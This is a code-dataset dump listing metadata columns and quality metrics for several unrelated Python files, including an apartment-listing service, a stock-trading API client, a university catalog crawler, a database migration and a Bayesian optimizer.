hexsha
string
size
int64
ext
string
lang
string
max_stars_repo_path
string
max_stars_repo_name
string
max_stars_repo_head_hexsha
string
max_stars_repo_licenses
list
max_stars_count
int64
max_stars_repo_stars_event_min_datetime
string
max_stars_repo_stars_event_max_datetime
string
max_issues_repo_path
string
max_issues_repo_name
string
max_issues_repo_head_hexsha
string
max_issues_repo_licenses
list
max_issues_count
int64
max_issues_repo_issues_event_min_datetime
string
max_issues_repo_issues_event_max_datetime
string
max_forks_repo_path
string
max_forks_repo_name
string
max_forks_repo_head_hexsha
string
max_forks_repo_licenses
list
max_forks_count
int64
max_forks_repo_forks_event_min_datetime
string
max_forks_repo_forks_event_max_datetime
string
content
string
avg_line_length
float64
max_line_length
int64
alphanum_fraction
float64
qsc_code_num_words_quality_signal
int64
qsc_code_num_chars_quality_signal
float64
qsc_code_mean_word_length_quality_signal
float64
qsc_code_frac_words_unique_quality_signal
float64
qsc_code_frac_chars_top_2grams_quality_signal
float64
qsc_code_frac_chars_top_3grams_quality_signal
float64
qsc_code_frac_chars_top_4grams_quality_signal
float64
qsc_code_frac_chars_dupe_5grams_quality_signal
float64
qsc_code_frac_chars_dupe_6grams_quality_signal
float64
qsc_code_frac_chars_dupe_7grams_quality_signal
float64
qsc_code_frac_chars_dupe_8grams_quality_signal
float64
qsc_code_frac_chars_dupe_9grams_quality_signal
float64
qsc_code_frac_chars_dupe_10grams_quality_signal
float64
qsc_code_frac_chars_replacement_symbols_quality_signal
float64
qsc_code_frac_chars_digital_quality_signal
float64
qsc_code_frac_chars_whitespace_quality_signal
float64
qsc_code_size_file_byte_quality_signal
float64
qsc_code_num_lines_quality_signal
float64
qsc_code_num_chars_line_max_quality_signal
float64
qsc_code_num_chars_line_mean_quality_signal
float64
qsc_code_frac_chars_alphabet_quality_signal
float64
qsc_code_frac_chars_comments_quality_signal
float64
qsc_code_cate_xml_start_quality_signal
float64
qsc_code_frac_lines_dupe_lines_quality_signal
float64
qsc_code_cate_autogen_quality_signal
float64
qsc_code_frac_lines_long_string_quality_signal
float64
qsc_code_frac_chars_string_length_quality_signal
float64
qsc_code_frac_chars_long_word_length_quality_signal
float64
qsc_code_frac_lines_string_concat_quality_signal
float64
qsc_code_cate_encoded_data_quality_signal
float64
qsc_code_frac_chars_hex_words_quality_signal
float64
qsc_code_frac_lines_prompt_comments_quality_signal
float64
qsc_code_frac_lines_assert_quality_signal
float64
qsc_codepython_cate_ast_quality_signal
float64
qsc_codepython_frac_lines_func_ratio_quality_signal
float64
qsc_codepython_cate_var_zero_quality_signal
bool
qsc_codepython_frac_lines_pass_quality_signal
float64
qsc_codepython_frac_lines_import_quality_signal
float64
qsc_codepython_frac_lines_simplefunc_quality_signal
float64
qsc_codepython_score_lines_no_logic_quality_signal
float64
qsc_codepython_frac_lines_print_quality_signal
float64
qsc_code_num_words
int64
qsc_code_num_chars
int64
qsc_code_mean_word_length
int64
qsc_code_frac_words_unique
null
qsc_code_frac_chars_top_2grams
int64
qsc_code_frac_chars_top_3grams
int64
qsc_code_frac_chars_top_4grams
int64
qsc_code_frac_chars_dupe_5grams
int64
qsc_code_frac_chars_dupe_6grams
int64
qsc_code_frac_chars_dupe_7grams
int64
qsc_code_frac_chars_dupe_8grams
int64
qsc_code_frac_chars_dupe_9grams
int64
qsc_code_frac_chars_dupe_10grams
int64
qsc_code_frac_chars_replacement_symbols
int64
qsc_code_frac_chars_digital
int64
qsc_code_frac_chars_whitespace
int64
qsc_code_size_file_byte
int64
qsc_code_num_lines
int64
qsc_code_num_chars_line_max
int64
qsc_code_num_chars_line_mean
int64
qsc_code_frac_chars_alphabet
int64
qsc_code_frac_chars_comments
int64
qsc_code_cate_xml_start
int64
qsc_code_frac_lines_dupe_lines
int64
qsc_code_cate_autogen
int64
qsc_code_frac_lines_long_string
int64
qsc_code_frac_chars_string_length
int64
qsc_code_frac_chars_long_word_length
int64
qsc_code_frac_lines_string_concat
null
qsc_code_cate_encoded_data
int64
qsc_code_frac_chars_hex_words
int64
qsc_code_frac_lines_prompt_comments
int64
qsc_code_frac_lines_assert
int64
qsc_codepython_cate_ast
int64
qsc_codepython_frac_lines_func_ratio
int64
qsc_codepython_cate_var_zero
int64
qsc_codepython_frac_lines_pass
int64
qsc_codepython_frac_lines_import
int64
qsc_codepython_frac_lines_simplefunc
int64
qsc_codepython_score_lines_no_logic
int64
qsc_codepython_frac_lines_print
int64
effective
string
hits
int64
bd7f5d02897acbff32966f7928ccfc825cfa419a
3,548
py
Python
apartmentbot/services/listing_service.py
sgarfield/ApartmentBot
327a47e879998fbb40bd26f84510467f4757d330
[ "MIT" ]
null
null
null
apartmentbot/services/listing_service.py
sgarfield/ApartmentBot
327a47e879998fbb40bd26f84510467f4757d330
[ "MIT" ]
null
null
null
apartmentbot/services/listing_service.py
sgarfield/ApartmentBot
327a47e879998fbb40bd26f84510467f4757d330
[ "MIT" ]
null
null
null
""" apartmentbot.services.listing_service """ import logging from dataclasses import dataclass from typing import List from dataclasses_json import dataclass_json from apartmentbot.geolocation.geolocation import distance_finder, neighborhood_locator, place_locator from apartmentbot.models import Listing, Place, Preferences from apartmentbot.sources.sources import sources from apartmentbot.repository.repository import listing_repository @dataclass_json @dataclass class ListingService: """ Class ListingService finds and saves apartment listings """ def find_listings(self, preferences: Preferences) -> List[Listing]: """ Finds all listings that match the set of apartment preferences :param preferences: A set of apartment preferences :return: A list of apartment listings (may return nothing) """ logging.info("Searching listings", extra={"preferences": preferences}) source_listings = self._search_sources(preferences) return self._match_additional(preferences, source_listings) def save_listing(self, listing: Listing): """ Stores listing in the database """ logging.info("Saving listing", extra={"listing": listing}) return listing_repository.add(listing) @staticmethod def _search_sources(preferences: Preferences): """ Returns listings from all available listing sites """ return [listings for source in sources for listings in source.get_results(preferences)] def _match_additional(self, preferences: Preferences, listings: List[Listing]) -> List[Listing]: """ Filters listings by optional additional preferences """ if not preferences.additional: return listings if preferences.additional.neighborhoods: listings = [listing for listing in listings if self._is_in_neighborhood(listing, preferences.additional.neighborhoods)] logging.debug('Neighborhood matches: %d', len(listings)) for place in preferences.additional.places: listings = [listing for listing in listings if self._is_near_place(listing, place.name, place.distance)] logging.debug('Place matches: %d', len(listings)) return listings @staticmethod def _is_in_neighborhood(listing: Listing, neighborhoods: List[str]) -> bool: """ Determines whether the listing is in a chosen neighborhood """ neighborhood = neighborhood_locator.find_neighborhood(latlng=listing.geotag) logging.debug("Listing neighborhood result: %s", neighborhood, extra={"listing_id": listing.id, "geotag": listing.geotag}) if neighborhood in neighborhoods: listing.neighborhood = neighborhood return True return False @staticmethod def _is_near_place(listing: Listing, place_name: str, max_distance: int) -> bool: """ Determines whether listing is within max_distance of some searchable place """ place = place_locator.find_place(place=place_name, latlng=listing.geotag) distance = distance_finder.find_distance(origin=listing.geotag, destination=place) logging.debug("Distance (meters) between listing and %s: %d", place_name, distance, extra={"listing_id": listing.id, "place_id": place, "geotag": listing.geotag}) if distance <= max_distance: listing.places.append(Place(place_name, distance)) return True return False
45.487179
101
0.698985
384
3,548
6.328125
0.255208
0.018519
0.021399
0.020576
0.054321
0.035391
0.035391
0.035391
0.035391
0
0
0
0.217587
3,548
77
102
46.077922
0.87536
0.152198
0
0.211538
0
0
0.070427
0
0
0
0
0
0
1
0.115385
false
0
0.153846
0
0.461538
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd7f8e09909844b7662e6b08100c7c6fbbff9197
6,016
py
Python
stocky.py
Naphtha/stocky
04e51b4270b28a1aa23597c07d67a2a99e4710cf
[ "MIT" ]
null
null
null
stocky.py
Naphtha/stocky
04e51b4270b28a1aa23597c07d67a2a99e4710cf
[ "MIT" ]
null
null
null
stocky.py
Naphtha/stocky
04e51b4270b28a1aa23597c07d67a2a99e4710cf
[ "MIT" ]
null
null
null
import requests import json BASE_URL = "https://api.stockfighter.io/ob/api/" class StockMinion(object): '''Handles all API related requests for stock/order functionality''' def __init__(self, api_key, account, venue, stock): # use sessions to persist the HTTP connection # this will prevent thrashing HTTP sockets self.session = requests.Session() # set header in session, this will be reused by every function header = {'X-Starfighter-Authorization' : api_key} self.session.headers.update(header) # set some basic, usually static, values self.account = account self.venue = venue self.stock = stock def check_api(self): # _call_api is sufficiently general to handle all cases data = self._call_api(BASE_URL + 'heartbeat', 'get') return data def check_venue(self): venue = self.venue data = self._call_api(BASE_URL + 'venues/{0}/heartbeat'.format(venue), 'get') return data def get_stocks_on_venue(self): venue = self.venue data = self._call_api(BASE_URL + 'venues/{0}/stocks'.format(venue), 'get') return data def get_orderbook(self): venue = self.venue stock = self.stock data = self._call_api(BASE_URL + 'venues/{0}/stocks/{1}'.format(venue, stock), 'get') return data # using kwargs here allows me to call this function with keywords or with a dict def place_order(self, **kwargs): kwargs['account'] = self.account kwargs['stock'] = self.stock kwargs['venue'] = self.venue # the args we need to make the request of the API mandatory = ['account', 'venue', 'stock', 'qty', 'direction', 'orderType'] # filter out the args we're missing from the kwargs dict missing_args = [x for x in mandatory if x not in kwargs] # raises exception with missing operands if(missing_args): raise TypeError("Missing '{0}' arguments in function call".format(', '.join(missing_args))) # leave the dictionary packed request_body = kwargs data = self._call_api(BASE_URL + 'venues/{0}/stocks/{1}/orders'.format(kwargs['venue'], kwargs['stock']), 'post', data=json.dumps(request_body)) return data def get_quote(self): venue = self.venue stock = self.stock data = self._call_api(BASE_URL + 'venues/{0}/stocks/{1}/quote'.format(venue, stock), 'get') return data def get_order_status(self, id): venue = self.venue stock = self.stock data = self._call_api(BASE_URL + 'venues/{0}/stocks/{1}/orders/{2}'.format(venue, stock, id), 'get') return data def cancel_order(self, id): venue = self.venue stock = self.stock data = self._call_api(BASE_URL + 'venues/{0}/stocks/{1}/orders/{2}'.format(venue, stock, id), 'delete') return data def get_all_orders(self, stock = None): venue = self.venue account = self.account if(stock): # get orders for specific stock data = self._call_api(BASE_URL + 'venues/{0}/accounts/{1}/stocks/{2}/orders'.format(venue, account, stock), 'get') else: data = self._call_api(BASE_URL + 'venues/{0}/accounts/{1}/orders'.format(venue, account), 'get') return data def _call_api(self, url, verb, *args, **kwargs): # use HTTP verb argument to pick the method to use from the Session object func = getattr(self.session, verb) resp = func(url, *args, **kwargs) data = StockMinion._process_response(resp.text, resp.status_code) return data @staticmethod def _process_json(json_obj): try: data = json.loads(json_obj) except ValueError as e: data = {} print(e) return data @staticmethod def _process_status(code): if(code != 200): print("Got a status code of {0}".format(code)) else: pass @staticmethod def _process_response(json_obj, code): data = StockMinion._process_json(json_obj) StockMinion._process_status(code) return data if __name__ == '__main__': import sys def print_test_result(data, function): if(data['ok'] == True): print("PASS: {0}()".format(function)) else: print("FAIL: {1}()".format(function)) # run some simple regression tests TEST_VENUE = "TESTEX" TEST_STOCK = "FOOBAR" TEST_ACCOUNT = "EXB123456" # pick up api key from local untracked file with open('api.key', 'r') as secret_file: API_KEY = secret_file.readlines()[0].rstrip('\n') instance = StockMinion(API_KEY, TEST_ACCOUNT, TEST_VENUE, TEST_STOCK) data = instance.check_api() # the numerous calls to print_test_result can probably be eliminated at some point print_test_result(data, 'check_api') data = instance.check_venue() print_test_result(data, 'check_venue') data = instance.get_stocks_on_venue() print_test_result(data, 'get_stocks_on_venue') data = instance.get_orderbook() print_test_result(data, 'get_orderbook') data = instance.place_order(qty = 100, direction = "buy", orderType = "limit", price = 100) print_test_result(data, 'place_order') order_num = data['id'] data = instance.get_quote() print_test_result(data, 'get_quote') data = instance.get_order_status(order_num) print_test_result(data, 'get_order_status') data = instance.cancel_order(order_num) print_test_result(data, 'cancel_order') data = instance.get_all_orders() print_test_result(data, 'get_all_orders') data = instance.get_all_orders(TEST_STOCK) print_test_result(data, 'get_all_orders')
30.231156
126
0.617686
765
6,016
4.658824
0.245752
0.032828
0.050505
0.058642
0.297419
0.228676
0.191077
0.156846
0.156846
0.15376
0
0.008874
0.269448
6,016
198
127
30.383838
0.802048
0.134641
0
0.258333
0
0
0.132112
0.045902
0
0
0
0
0
1
0.125
false
0.016667
0.025
0
0.258333
0.125
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd8031a5c133b457ce688112eb2e76fc2cc5af7d
54
py
Python
test.py
periclescy/research-qre
7fafbc7120235fe6cb75a2f5477922d813c31066
[ "OLDAP-2.3" ]
null
null
null
test.py
periclescy/research-qre
7fafbc7120235fe6cb75a2f5477922d813c31066
[ "OLDAP-2.3" ]
null
null
null
test.py
periclescy/research-qre
7fafbc7120235fe6cb75a2f5477922d813c31066
[ "OLDAP-2.3" ]
null
null
null
for i in range(4): print(i) print("Hello world")
10.8
20
0.611111
10
54
3.3
0.8
0
0
0
0
0
0
0
0
0
0
0.02381
0.222222
54
4
21
13.5
0.761905
0
0
0
0
0
0.203704
0
0
0
0
0
0
1
0
false
0
0
0
0
0.666667
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
3
bd80d005cadf2946180d02a5ee8eb0ce0d0f3e91
6,481
py
Python
crawlers/ucsc_old/ucsc/spiders/registrar_courses.py
coursegraph/CourseGraph
9f05cd912b393ba14721411fe77f3856812c000f
[ "MIT" ]
5
2018-07-01T15:48:11.000Z
2020-07-31T17:06:10.000Z
crawlers/ucsc_old/ucsc/spiders/registrar_courses.py
coursegraph/CourseGraph
9f05cd912b393ba14721411fe77f3856812c000f
[ "MIT" ]
7
2018-07-09T21:17:19.000Z
2018-07-25T17:05:33.000Z
crawlers/ucsc_old/ucsc/spiders/registrar_courses.py
coursegraph/CourseGraph
9f05cd912b393ba14721411fe77f3856812c000f
[ "MIT" ]
4
2018-07-01T19:45:23.000Z
2019-03-17T21:12:03.000Z
# -*- coding: utf-8 -*- import scrapy import os from ucsc.items import FacultyItem, ProgramStatementItem, CourseDescriptionItem def path_components (path): if '://' in path: path = path.split('://')[1] parts = path.split('/') while parts and parts[0] == '': parts = parts[1:] while parts and parts[-1] == '': parts = parts[:-1] return parts assert(path_components('') == []) assert(path_components('/') == []) assert(path_components('foo/') == ['foo']) assert(path_components('/bar') == ['bar']) assert(path_components('foo/bar') == ['foo','bar']) def merge_url (url, rel): # note: blame seiji for all the issues with this code thing = url.split('://')[0] if '://' in url else 'https' if url and url[-1] == '/': url = path_components(url) else: url = path_components(url)[:-1] for part in path_components(rel): if part == '..': url = url[:-1] else: url.append(part) return thing + '://' + '/'.join(url) assert(merge_url('https://registrar.ucsc.edu/catalog/programs-courses/index.html', '../foo/bar/../baz.html') == 'https://registrar.ucsc.edu/catalog/foo/baz.html') assert(merge_url('', 'bar.baz') == 'https://bar.baz') assert(merge_url('https://foo/bar/baz.html', '') == 'https://foo/bar') registrar_base_url = 'https://registrar.ucsc.edu/catalog/programs-courses' base_course_description_url = 'https://registrar.ucsc.edu/catalog/programs-courses/course-descriptions' base_faculty_url = 'https://registrar.ucsc.edu/catalog/programs-courses/faculty' base_program_description_url = 'https://registrar.ucsc.edu/catalog/programs-courses/program-statements' class RegistrarCoursesSpider(scrapy.Spider): name = 'registrar_courses' allowed_domains = ['registrar.ucsc.edu'] start_urls = [merge_url(registrar_base_url, 'index.html')] def __init__(self, *args, **kwargs): super(RegistrarCoursesSpider, self).__init__(*args, **kwargs) self.crawled = set() def parse (self, response): print("Parsing %s"%response.url) if base_course_description_url in response.url: yield self.parse_course_info(response) elif base_faculty_url in response.url: yield self.parse_faculty_info(response) elif base_program_description_url in response.url: yield self.parse_program_info(response) all_links = response.xpath('//a') for link in all_links: #print("Got link: %s"%link.extract()) try: href = link.xpath('@href').extract()[0] def is_local_url (url): for thing in ('http:','https:','C:','www','ucsc.edu'): if thing in url: return False return True url = merge_url(response.url, href) if is_local_url(href) else href if url in self.crawled: continue #print("Got URL: %s"%url) self.crawled.add(url) if registrar_base_url in url: yield { 'url': url } yield scrapy.Request(url, self.parse) else: pass #print("Skipping %s"%url) except IndexError: pass def parse_course_info (self, response): info = CourseDescriptionItem() info['url'] = response.url print("Got %s"%response.url) return info def parse_faculty_info (self, response): info = FacultyItem() info['url'] = response.url print("Got %s"%response.url) return info def parse_program_info (self, response): info = ProgramStatementItem() info['url'] = response.url print("Got %s"%response.url) return info class Unused: def parse(self, response): # Get links to all course pages from the registrar page_content = response\ .xpath('body/div[@id="wrap"]/div[@id="container"]/div[@id="content"]')\ .xpath('div[@id="sprflt"]/div[@id="main"]/div[contains(@class,"content")]') panel_elems = page_content.xpath('table/tbody/tr/td') self.depts = {} self.crawled = set() for panel in panel_elems: program_statements = panel.xpath('p/a') for a in program_statements: # print(a.xpath('@href').extract()) dept = a.xpath('@href').re(r'program-statements/(\w+)\.html')[0] title = a.xpath('text()').extract()[0] url = 'https://registrar.ucsc.edu/catalog/programs-courses/program-statements/%s.html'%dept self.depts[dept] = title self.crawled.add(url) yield scrapy.Request(url, callback=self.parse_program_info) #course_url = 'https://registrar.ucsc.edu/catalog/programs-courses/course-descriptions/%s.html'%dept program_url = 'https://registrar.ucsc.edu/catalog/programs-courses/program-statements/%s.html'%dept faculty_url = 'https://registrar.ucsc.edu/catalog/programs-courses/faculty/%s.html'%dept #yield scrapy.Request(course_url, callback=self.parse_course_info) yield scrapy.Request(program_url, callback=self.parse_program_info) yield scrapy.Request(faculty_url, callback=self.parse_faculty_info) def parse_program_info (self, response): page_content = response\ .xpath('body/div[@id="wrap"]/div[@id="container"]/div[@id="content"]')\ .xpath('div[@id="sprflt"]/div[@id="main"]/div[contains(@class,"content")]') page_links = page_content.xpath('p[3]/a') for a in page_links: href, regex = a.xpath('@href'), r'\.\./([\w\-]+/\w+\.html)' try: page = href.re(regex)[0] title = a.xpath('text()').extract()[0] url = 'https://registrar.ucsc.edu/catalog/programs-courses/program-statements/%s'%page print("\n%s: %s"%(url, title)) except IndexError: print("Could not match '%s' with '%s'"%(href, regex)) content = page_content #print("%s"%content.extract()[0]) def parse_course_info (self, response): print("Got %s"%response.url) def parse_faculty_info (self, response): print("Got %s"%response.url)
39.760736
117
0.583552
773
6,481
4.767141
0.182406
0.024695
0.052103
0.062687
0.43772
0.409498
0.354138
0.330258
0.263501
0.257531
0
0.003558
0.262768
6,481
162
118
40.006173
0.767685
0.067428
0
0.314961
0
0.015748
0.217305
0.054036
0
0
0
0
0.062992
1
0.094488
false
0.015748
0.023622
0
0.212598
0.062992
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd82bc5f657a9986b7a9b6aa8522cff06f897b1e
9,528
py
Python
yui/migrations/versions/0e7bdd5c7473_refactor_datetime_fields.py
item4/yui
8628d0d54b94ada3cbe7d1b0f624063258bad10a
[ "MIT" ]
36
2017-06-12T01:09:46.000Z
2021-01-31T17:57:41.000Z
yui/migrations/versions/0e7bdd5c7473_refactor_datetime_fields.py
item4/yui
8628d0d54b94ada3cbe7d1b0f624063258bad10a
[ "MIT" ]
145
2017-06-21T13:31:29.000Z
2021-06-20T01:01:30.000Z
yui/migrations/versions/0e7bdd5c7473_refactor_datetime_fields.py
item4/yui
8628d0d54b94ada3cbe7d1b0f624063258bad10a
[ "MIT" ]
21
2017-07-24T15:53:19.000Z
2021-12-23T04:18:31.000Z
"""Refactor datetime fields Revision ID: 0e7bdd5c7473 Revises: Create Date: 2020-05-10 17:28:07.620112 """ import enum from alembic import op import sqlalchemy as sa from sqlalchemy_utils import ChoiceType from sqlalchemy_utils import URLType from yui.apps.info.toranoana.models import Stock from yui.apps.info.toranoana.models import Target from yui.orm.types import JSONType from yui.orm.types import TimezoneType # revision identifiers, used by Alembic. revision = '0e7bdd5c7473' down_revision = None branch_labels = None depends_on = None @enum.unique class Server(enum.IntEnum): pass def upgrade(): op.create_table( 'event_log', sa.Column('id', sa.Integer(), nullable=False), sa.Column('ts', sa.String(), nullable=False), sa.Column('channel', sa.String(), nullable=False), sa.PrimaryKeyConstraint('id'), ) op.create_table( 'json_cache', sa.Column('id', sa.Integer(), nullable=False), sa.Column('name', sa.String(), nullable=False), sa.Column('body', JSONType(), nullable=True), sa.Column( 'created_datetime', sa.DateTime(timezone=True), nullable=False ), sa.Column('created_timezone', TimezoneType(), nullable=True), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('name'), ) op.create_table( 'memo', sa.Column('id', sa.Integer(), nullable=False), sa.Column('keyword', sa.String(), nullable=False), sa.Column('text', sa.Text(), nullable=False), sa.Column('author', sa.String(), nullable=False), sa.Column( 'created_datetime', sa.DateTime(timezone=True), nullable=False ), sa.Column('created_timezone', TimezoneType(), nullable=True), sa.PrimaryKeyConstraint('id'), ) op.create_table( 'rss_feed_url', sa.Column('id', sa.Integer(), nullable=False), sa.Column('url', sa.String(), nullable=False), sa.Column('channel', sa.String(), nullable=False), sa.Column( 'updated_datetime', sa.DateTime(timezone=True), nullable=False ), sa.Column('updated_timezone', TimezoneType(), nullable=True), sa.PrimaryKeyConstraint('id'), ) op.create_table( 'saomd_notice', sa.Column('id', sa.Integer(), nullable=False), sa.Column('notice_id', sa.Integer(), nullable=False), sa.Column( 'server', ChoiceType(Server, impl=sa.Integer()), nullable=False ), sa.Column('title', sa.String(), nullable=False), sa.Column('duration', sa.String(), nullable=True), sa.Column('short_description', sa.String(), nullable=True), sa.Column('is_deleted', sa.Boolean(), nullable=True), sa.PrimaryKeyConstraint('id'), ) op.create_table( 'toranoana_author', sa.Column('id', sa.Integer(), nullable=False), sa.Column('code', sa.String(), nullable=False), sa.Column('name', sa.String(), nullable=False), sa.PrimaryKeyConstraint('id'), ) op.create_table( 'toranoana_character', sa.Column('id', sa.Integer(), nullable=False), sa.Column('code', sa.String(), nullable=False), sa.Column('name', sa.String(), nullable=False), sa.Column('name_ko', sa.String(), nullable=True), sa.PrimaryKeyConstraint('id'), ) op.create_table( 'toranoana_circle', sa.Column('id', sa.Integer(), nullable=False), sa.Column('code', sa.String(), nullable=False), sa.Column('name', sa.String(), nullable=False), sa.PrimaryKeyConstraint('id'), ) op.create_table( 'toranoana_coupling', sa.Column('id', sa.Integer(), nullable=False), sa.Column('code', sa.String(), nullable=False), sa.Column('name', sa.String(), nullable=False), sa.Column('name_ko', sa.String(), nullable=True), sa.PrimaryKeyConstraint('id'), ) op.create_table( 'toranoana_genre', sa.Column('id', sa.Integer(), nullable=False), sa.Column('code', sa.String(), nullable=False), sa.Column('name', sa.String(), nullable=False), sa.Column('name_ko', sa.String(), nullable=True), sa.PrimaryKeyConstraint('id'), ) op.create_table( 'toranoana_tag', sa.Column('id', sa.Integer(), nullable=False), sa.Column('code', sa.String(), nullable=False), sa.Column('name', sa.String(), nullable=False), sa.Column('name_ko', sa.String(), nullable=True), sa.PrimaryKeyConstraint('id'), ) op.create_table( 'toranoana_item', sa.Column('id', sa.Integer(), nullable=False), sa.Column('code', sa.String(), nullable=False), sa.Column('title', sa.String(), nullable=False), sa.Column('image_url', URLType(), nullable=False), sa.Column('price', sa.Integer(), nullable=False), sa.Column( 'stock', ChoiceType(Stock, impl=sa.Integer()), nullable=False ), sa.Column('genre_id', sa.Integer(), nullable=False), sa.Column( 'male_target', ChoiceType(Target, impl=sa.Integer()), nullable=False, ), sa.Column( 'female_target', ChoiceType(Target, impl=sa.Integer()), nullable=False, ), sa.Column( 'checked_datetime', sa.DateTime(timezone=True), nullable=False ), sa.Column('checked_timezone', TimezoneType(), nullable=True), sa.Column( 'updated_datetime', sa.DateTime(timezone=True), nullable=False ), sa.Column('updated_timezone', TimezoneType(), nullable=True), sa.Column('is_deleted', sa.Boolean(), nullable=False), sa.ForeignKeyConstraint( ['genre_id'], ['toranoana_genre.id'], ), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('code'), ) op.create_table( 'toranoana_watch', sa.Column('id', sa.Integer(), nullable=False), sa.Column('print_target_id', sa.String(), nullable=False), sa.Column('genre_id', sa.Integer(), nullable=True), sa.Column( 'male', ChoiceType(Target, impl=sa.Integer()), nullable=False ), sa.Column( 'female', ChoiceType(Target, impl=sa.Integer()), nullable=False ), sa.ForeignKeyConstraint( ['genre_id'], ['toranoana_genre.id'], ), sa.PrimaryKeyConstraint('id'), ) op.create_table( 'toranoana_itemauthor', sa.Column('item_id', sa.Integer(), nullable=False), sa.Column('author_id', sa.Integer(), nullable=False), sa.ForeignKeyConstraint( ['author_id'], ['toranoana_author.id'], ), sa.ForeignKeyConstraint( ['item_id'], ['toranoana_item.id'], ), sa.PrimaryKeyConstraint('item_id', 'author_id'), ) op.create_table( 'toranoana_itemcharacter', sa.Column('item_id', sa.Integer(), nullable=False), sa.Column('character_id', sa.Integer(), nullable=False), sa.ForeignKeyConstraint( ['character_id'], ['toranoana_character.id'], ), sa.ForeignKeyConstraint( ['item_id'], ['toranoana_item.id'], ), sa.PrimaryKeyConstraint('item_id', 'character_id'), ) op.create_table( 'toranoana_itemcircle', sa.Column('item_id', sa.Integer(), nullable=False), sa.Column('circle_id', sa.Integer(), nullable=False), sa.ForeignKeyConstraint( ['circle_id'], ['toranoana_circle.id'], ), sa.ForeignKeyConstraint( ['item_id'], ['toranoana_item.id'], ), sa.PrimaryKeyConstraint('item_id', 'circle_id'), ) op.create_table( 'toranoana_itemcoupling', sa.Column('item_id', sa.Integer(), nullable=False), sa.Column('coupling_id', sa.Integer(), nullable=False), sa.ForeignKeyConstraint( ['coupling_id'], ['toranoana_coupling.id'], ), sa.ForeignKeyConstraint( ['item_id'], ['toranoana_item.id'], ), sa.PrimaryKeyConstraint('item_id', 'coupling_id'), ) op.create_table( 'toranoana_itemtag', sa.Column('item_id', sa.Integer(), nullable=False), sa.Column('tag_id', sa.Integer(), nullable=False), sa.ForeignKeyConstraint( ['item_id'], ['toranoana_item.id'], ), sa.ForeignKeyConstraint( ['tag_id'], ['toranoana_tag.id'], ), sa.PrimaryKeyConstraint('item_id', 'tag_id'), ) def downgrade(): op.drop_table('toranoana_itemtag') op.drop_table('toranoana_itemcoupling') op.drop_table('toranoana_itemcircle') op.drop_table('toranoana_itemcharacter') op.drop_table('toranoana_itemauthor') op.drop_table('toranoana_watch') op.drop_table('toranoana_item') op.drop_table('toranoana_tag') op.drop_table('toranoana_genre') op.drop_table('toranoana_coupling') op.drop_table('toranoana_circle') op.drop_table('toranoana_character') op.drop_table('toranoana_author') op.drop_table('saomd_notice') op.drop_table('rss_feed_url') op.drop_table('memo') op.drop_table('json_cache') op.drop_table('event_log')
33.787234
75
0.592149
1,025
9,528
5.361951
0.11122
0.112082
0.171943
0.202511
0.740721
0.695051
0.666667
0.598799
0.585335
0.497999
0
0.004755
0.24958
9,528
281
76
33.907473
0.763916
0.014694
0
0.547893
0
0
0.164179
0.014179
0
0
0
0
0
1
0.007663
false
0.003831
0.034483
0
0.045977
0.003831
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
bd82c29e5bee15a3671a883151076960c6a72038
1,937
py
Python
gradient_free_optimizers/optimizers/exp_opt/local_bayes_opt.py
Wollala/Gradient-Free-Optimizers
8fb1608c264431b87f66fd2d233b76a0fa75316c
[ "MIT" ]
1
2022-02-25T03:14:48.000Z
2022-02-25T03:14:48.000Z
gradient_free_optimizers/optimizers/exp_opt/local_bayes_opt.py
Wollala/Gradient-Free-Optimizers
8fb1608c264431b87f66fd2d233b76a0fa75316c
[ "MIT" ]
null
null
null
gradient_free_optimizers/optimizers/exp_opt/local_bayes_opt.py
Wollala/Gradient-Free-Optimizers
8fb1608c264431b87f66fd2d233b76a0fa75316c
[ "MIT" ]
null
null
null
# Author: Simon Blanke # Email: simon.blanke@yahoo.com # License: MIT License import time import random import numpy as np from ..base_optimizer import BaseOptimizer from ...search import Search from ._sub_search_spaces import SubSearchSpaces from ..smb_opt import BayesianOptimizer class LocalBayesianOptimizer(BaseOptimizer, Search): name = "Local Bayesian Optimizer" def __init__( self, *args, max_size=300000, n_positions=20, local_range=100, **kwargs ): super().__init__(*args, **kwargs) self.max_size = max_size self.n_positions = n_positions self.local_range = local_range self.bayes_opt = BayesianOptimizer(self.conv.search_space) def create_local_smbo(self, current_position): local_ss = {} for idx, para in enumerate(self.conv.para_names): max_dim = max(0, current_position[idx] + self.local_range) min_dim = min( self.conv.dim_sizes[idx], current_position[idx] - self.local_range ) dim_pos = np.array(self.conv.search_space_positions[idx]) dim_pos_center = np.where( np.logical_and(dim_pos >= min_dim, dim_pos <= max_dim) )[0] local_ss[para] = dim_pos_center self.bayes_opt = BayesianOptimizer(local_ss) def finish_initialization(self): self.create_local_smbo(self.pos_current) @BaseOptimizer.track_nth_iter def iterate(self): pos_loc = self.bayes_opt.iterate() pos_new = self.bayes_opt.conv.position2value(pos_loc) return pos_new def evaluate(self, score_new): self.bayes_opt.evaluate(score_new) self.score_new = score_new self._evaluate_new2current(score_new) self._evaluate_current2best() modZero = self.nth_iter % self.n_positions == 0 if modZero: self.create_local_smbo(self.pos_current)
27.671429
82
0.665978
246
1,937
4.926829
0.341463
0.041254
0.049505
0.04703
0.107261
0.107261
0.054455
0
0
0
0
0.011636
0.245741
1,937
69
83
28.072464
0.817933
0.036655
0
0.044444
0
0
0.012889
0
0
0
0
0
0
1
0.111111
false
0
0.155556
0
0.333333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd83ed580ee241d7bccf7170f916c7c26cd0e7da
2,235
py
Python
storage.py
